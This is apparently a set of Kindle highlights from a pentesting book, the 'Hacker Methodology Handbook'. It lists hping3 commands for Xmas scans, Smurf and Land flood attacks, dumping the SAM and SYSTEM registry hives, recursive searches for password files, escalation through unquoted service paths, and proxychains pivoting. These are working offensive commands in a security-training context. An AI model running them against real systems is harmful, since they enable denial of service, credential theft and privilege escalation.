Hacker Methodology Handbook

# Hacker Methodology Handbook ![rw-book-cover](https://m.media-amazon.com/images/I/61CSx9eyFPL._SY160.jpg) ## Metadata - Author: [[Thomas Bobeck]] - Full Title: Hacker Methodology Handbook - Category: #books ## Highlights - Xmas Scan: hping3 -c 1 -V -p $port -s 5050 -M 0 -UPF $url Smurf Attack: hping3 -1 --flood -a $ip BROADCAST_ADDRESS DOS Land Attack: hping3 -V -c 1000000 -d 120 -S -w 64 -p $port -s $port --flood --rand-source $ip Options ([Location 311](https://readwise.io/to_kindle?action=open&asin=B082BD4CTL&location=311)) - When using other modules View information about the module with “msf> info path/of/module” and set the any additional variables as needed. ([Location 447](https://readwise.io/to_kindle?action=open&asin=B082BD4CTL&location=447)) - Notes Below is a break down of the above examples and their fields. These fields are Minute, Hour, Day of the month(example 1st, 2nd, 10th), Month (Examples 4th, 8th, 9th), Day of the week (Examples: 1st, 2nd, ([Location 1278](https://readwise.io/to_kindle?action=open&asin=B082BD4CTL&location=1278)) - Method 3 registry hives Step 1 Save a backup of the sam\system files via CLI: reg save HKLM\SYSTEM SystemBkup.hiv reg save HKLM\SAM SamBkup.hiv ([Location 1349](https://readwise.io/to_kindle?action=open&asin=B082BD4CTL&location=1349)) - Recurisive dir password search dir /s *pass* == *cred* == *vnc* == *.config* findstr password search: findstr /spin "password" *.* ([Location 1370](https://readwise.io/to_kindle?action=open&asin=B082BD4CTL&location=1370)) - Not Vulnerable: BINARY_PATH_NAME : “c:\program files\sub dir\program name” Vulnerable: BINARY_PATH_NAME : c:\program files\sub dir\program name ([Location 1378](https://readwise.io/to_kindle?action=open&asin=B082BD4CTL&location=1378)) - Service paths which are unquoted and contain spaces within the path can be exploited. With the above examples this can be accomplished by placing a file in either c:\ or c:\program files\dir\ with the same name as the file that was scheduled to be ran. This new file will be ran when the service starts. Typically services will be starting with the SYSTEM privilege. ([Location 1388](https://readwise.io/to_kindle?action=open&asin=B082BD4CTL&location=1388)) - unix-privesc-check detailed ([Location 1414](https://readwise.io/to_kindle?action=open&asin=B082BD4CTL&location=1414)) - proxychains nmap $ip Notes Prior to using the proxychain program the below setup steps must be accomplished. Setup steps Step 1 Create SSH tunnel to the machine you wish to tunnel through: ssh -D 127.0.0.1:1080 -p 22 $user@$ip Step 2 Configure your proxychains.conf file: Add “socks4 127.0.0.1 1080” to /etc/proxychains.conf ([Location 1461](https://readwise.io/to_kindle?action=open&asin=B082BD4CTL&location=1461))